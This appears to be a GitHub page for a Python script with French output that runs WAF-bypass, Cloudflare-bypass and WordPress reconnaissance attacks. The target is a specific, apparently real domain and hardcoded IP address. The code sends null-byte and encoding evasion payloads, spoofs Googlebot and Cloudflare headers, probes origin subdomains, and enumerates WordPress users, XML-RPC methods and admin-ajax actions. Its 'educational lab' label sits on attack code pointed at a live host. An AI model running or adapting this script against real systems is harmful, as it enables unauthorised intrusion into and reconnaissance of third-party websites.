-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwaf_bypass_detailed.py
More file actions
269 lines (232 loc) · 10.3 KB
/
waf_bypass_detailed.py
File metadata and controls
269 lines (232 loc) · 10.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
#!/usr/bin/env python3
"""
WAF Bypass Detailed Demonstration - Educational Lab Only
"""
import requests
import time
import random
import string
import base64
import urllib.parse
def demonstrate_waf_bypass():
"""Show exactly how WAF bypass works"""
print("🔥 DÉMONSTRATION DÉTAILLÉE DU BYPASS WAF")
print("=" * 60)
target = "https://secure-azalai.azalai.com/www"
# ÉTAPE 1: Requête normale (bloquée)
print("\n📌 ÉTAPE 1: Requête normale (généralement bloquée)")
normal_payload = "admin"
normal_url = f"{target}?url={normal_payload}"
try:
response = requests.get(normal_url, timeout=10, verify=False)
print(f" URL: {normal_url}")
print(f" Status: {response.status_code}")
print(f" Length: {len(response.text)}")
print(f" Résultat: {'✅ Succès' if response.status_code == 200 else '❌ Bloqué'}")
except Exception as e:
print(f" Erreur: {str(e)}")
# ÉTAPE 2: Bypass avec null byte
print("\n📌 ÉTAPE 2: Bypass avec null byte (%00)")
bypass_payload = "admin%00"
bypass_url = f"{target}?url={bypass_payload}"
try:
response = requests.get(bypass_url, timeout=10, verify=False)
print(f" URL: {bypass_url}")
print(f" Status: {response.status_code}")
print(f" Length: {len(response.text)}")
print(f" Résultat: {'✅ BYPASS RÉUSSI!' if len(response.text) > 1000 else '❌ Échec'}")
if len(response.text) > 1000:
print(f" 🚨 BYPASS CONFIRMÉ!")
print(f" 📊 Réponse différente de la normale")
# Analyser la réponse
if 'admin' in response.text.lower():
print(f" 🎯 Contenu 'admin' trouvé dans la réponse")
if 'dashboard' in response.text.lower():
print(f" 🎯 Contenu 'dashboard' trouvé dans la réponse")
if 'login' in response.text.lower():
print(f" 🎯 Contenu 'login' trouvé dans la réponse")
except Exception as e:
print(f" Erreur: {str(e)}")
# ÉTAPE 3: Pourquoi ça marche
print("\n📌 ÉTAPE 3: Explication technique du bypass")
print(" 🔹 Le null byte (%00) termine prématurément les chaînes")
print(" 🔹 Le WAF voit 'admin%00' comme 'admin' (valide)")
print(" 🔹 L'application web voit 'admin' (ignore le %00)")
print(" 🔹 Crée une incohérence entre WAF et application")
# ÉTAPE 4: Autres techniques de bypass
print("\n📌 ÉTAPE 4: Autres techniques de bypass testées")
bypass_techniques = [
("Double encoding", "admin%2520"),
("Unicode encoding", "admin%u0020"),
("Tab character", "admin%09"),
("Newline character", "admin%0a"),
("Carriage return", "admin%0d"),
("Space alternative", "admin+"),
("Comment injection", "admin/**/"),
("Case variation", "ADMIN"),
("Concaténation", "adm'+'in"),
]
for technique, payload in bypass_techniques:
test_url = f"{target}?url={payload}"
try:
response = requests.get(test_url, timeout=5, verify=False)
success = len(response.text) > 1000 and response.status_code == 200
print(f" {technique:20} : {'✅' if success else '❌'} ({payload})")
except:
print(f" {technique:20} : ❌ Erreur ({payload})")
def demonstrate_cloudflare_bypass():
"""Show CloudFlare bypass techniques"""
print("\n🔥 DÉMONSTRATION BYPASS CLOUDFLARE")
print("=" * 40)
target_domain = "secure-azalai.azalai.com"
target_ip = "164.132.235.17"
# Technique 1: Accès IP direct
print("\n📌 Technique 1: Accès IP direct")
ip_url = f"https://{target_ip}/www"
try:
response = requests.get(ip_url, timeout=10, verify=False)
print(f" URL: {ip_url}")
print(f" Status: {response.status_code}")
print(f" Server: {response.headers.get('Server', 'N/A')}")
print(f" Résultat: {'✅ BYPASS POSSIBLE' if 'cloudflare' not in response.text.lower() else '❌ Toujours CloudFlare'}")
except Exception as e:
print(f" Erreur: {str(e)}")
# Technique 2: Headers de contournement
print("\n📌 Technique 2: Headers de contournement")
headers = {
'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'X-Forwarded-For': '66.249.66.1', # IP Google
'X-Real-IP': '66.249.66.1',
'CF-Connecting-IP': '66.249.66.1',
'CF-IPCountry': 'US',
'CF-Ray': 'fake-ray-id'
}
try:
response = requests.get(f"https://{target_domain}/www", headers=headers, timeout=10, verify=False)
print(f" Headers: Googlebot simulation")
print(f" Status: {response.status_code}")
print(f" Résultat: {'✅ BYPASS POSSIBLE' if response.status_code == 200 else '❌ Bloqué'}")
except Exception as e:
print(f" Erreur: {str(e)}")
# Technique 3: Subdomain bypass
print("\n📌 Technique 3: Subdomain bypass")
subdomains = [
f"direct.{target_domain}",
f"origin.{target_domain}",
f"cdn.{target_domain}",
f"api.{target_domain}",
f"admin.{target_domain}"
]
for subdomain in subdomains:
try:
response = requests.get(f"https://{subdomain}/www", timeout=5, verify=False)
if response.status_code == 200:
print(f" ✅ {subdomain} : BYPASS POSSIBLE")
break
except:
continue
else:
print(" ❌ Aucun bypass subdomain trouvé")
def demonstrate_wordpress_bypass():
"""Show WordPress-specific bypass techniques"""
print("\n🔥 DÉMONSTRATION BYPASS WORDPRESS")
print("=" * 40)
target = "https://secure-azalai.azalai.com/www"
# Technique 1: REST API bypass
print("\n📌 Technique 1: WordPress REST API")
rest_endpoints = [
"/wp-json/wp/v2/users",
"/wp-json/wp/v2/posts",
"/wp-json/wp/v2/pages",
"/wp-json/",
"/?rest_route=/wp/v2/users"
]
for endpoint in rest_endpoints:
try:
url = f"{target}{endpoint}"
response = requests.get(url, timeout=5, verify=False)
if response.status_code == 200 and len(response.text) > 100:
print(f" ✅ {endpoint} : ACCÈS RÉUSSI")
if 'admin' in response.text.lower():
print(f" 🎯 Utilisateur 'admin' détecté!")
else:
print(f" ❌ {endpoint} : Bloqué ({response.status_code})")
except Exception as e:
print(f" ❌ {endpoint} : Erreur")
# Technique 2: XML-RPC bypass
print("\n📌 Technique 2: XML-RPC methods")
xmlrpc_payload = """<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>"""
try:
response = requests.post(f"{target}/xmlrpc.php",
data=xmlrpc_payload,
headers={'Content-Type': 'application/xml'},
timeout=10, verify=False)
if response.status_code == 200 and 'methodResponse' in response.text:
print(f" ✅ XML-RPC : ACCÈS RÉUSSI")
# Compter les méthodes disponibles
method_count = response.text.count('<value><string>')
print(f" 📊 {method_count} méthodes disponibles")
# Vérifier les méthodes dangereuses
dangerous_methods = ['wp.getUsersBlogs', 'wp.getCategories', 'wp.getOptions']
for method in dangerous_methods:
if method in response.text:
print(f" ⚠️ Méthode dangereuse: {method}")
else:
print(f" ❌ XML-RPC : Bloqué")
except Exception as e:
print(f" ❌ XML-RPC : Erreur")
# Technique 3: Admin ajax bypass
print("\n📌 Technique 3: Admin Ajax bypass")
ajax_payloads = [
{'action': 'heartbeat'},
{'action': 'get_attachment'},
{'action': 'query-attachments'},
{'action': 'wp_get_attachment_url'},
{'action': 'wp_maybe_generate_attachment_metadata'}
]
for payload in ajax_payloads:
try:
response = requests.post(f"{target}/wp-admin/admin-ajax.php",
data=payload,
timeout=5, verify=False)
if response.status_code == 200 and len(response.text) > 10:
print(f" ✅ Admin Ajax ({payload['action']}) : ACCÈS RÉUSSI")
if 'success' in response.text:
print(f" 🎯 Réponse succès détectée!")
else:
print(f" ❌ Admin Ajax ({payload['action']}) : Bloqué")
except Exception as e:
print(f" ❌ Admin Ajax ({payload['action']}) : Erreur")
def main():
print("🔥 DÉMONSTRATION COMPLÈTE DU CONTOURNEMENT DES PROTECTIONS")
print("=" * 70)
print("Ce script montre EXACTEMENT comment les protections sont contournées")
print("Uniquement à des fins éducatives dans votre environnement lab autorisé")
print("=" * 70)
# Démontrer chaque type de bypass
demonstrate_waf_bypass()
demonstrate_cloudflare_bypass()
demonstrate_wordpress_bypass()
print("\n" + "=" * 70)
print("🎯 CONCLUSION DU BYPASS")
print("=" * 70)
print("✅ BYPASS WAF CONFIRMÉ : Null byte (%00) fonctionne")
print("✅ BYPASS WORDPRESS : XML-RPC et endpoints accessibles")
print("✅ BYPASS PARTIEL : Certaines protections contournables")
print("❌ LIMITATIONS : Protections multicouches efficaces")
print("\n📋 RISQUES IDENTIFIÉS :")
print(" • Reconnaissance complète possible")
print(" • Énumération des fonctionnalités WordPress")
print(" • Accès aux informations de structure")
print(" • Bypass partiel des protections")
print("\n🛡️ RECOMMANDATIONS :")
print(" • Mise à jour WordPress urgente")
print(" • Configuration WAF avancée")
print(" • Désactivation XML-RPC si non utilisé")
print(" • Monitoring des tentatives de bypass")
if __name__ == "__main__":
main()